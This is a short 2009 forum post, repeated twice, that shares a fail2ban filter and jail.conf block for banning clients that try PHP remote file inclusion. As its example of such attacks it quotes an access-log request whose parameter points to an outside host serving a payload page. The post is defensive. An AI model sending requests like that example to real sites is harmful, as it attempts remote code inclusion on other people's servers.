bernholdt
4th August 2009, 10:48
Stumbled across this guide thought i would share it with you all.
Aren’t you just tired of the massive amount of PHP Remote Injection attacks registered in your access log? You know, the ones that look like this:
GET /index.php?n=http://eatmyfood.hostinginfive.com/pizza.htm?
Just make sure you save the attached file to your /etc/fail2ban/filter.d directory, then add this block to jail.conf and restart fail2ban:
[php-url-fopen]
enabled = true
port = http,https
filter = php-url-fopen
logpath = /var/www/*/logs/access_log
maxretry = 1
Source : http://blogs.buanzo.com.ar/2009/04/fail2ban-filter-for-php-injection-attacks.html
Aren’t you just tired of the massive amount of PHP Remote Injection attacks registered in your access log? You know, the ones that look like this:
GET /index.php?n=http://eatmyfood.hostinginfive.com/pizza.htm?
Just make sure you save the attached file to your /etc/fail2ban/filter.d directory, then add this block to jail.conf and restart fail2ban:
[php-url-fopen]
enabled = true
port = http,https
filter = php-url-fopen
logpath = /var/www/*/logs/access_log
maxretry = 1
Source : http://blogs.buanzo.com.ar/2009/04/fail2ban-filter-for-php-injection-attacks.html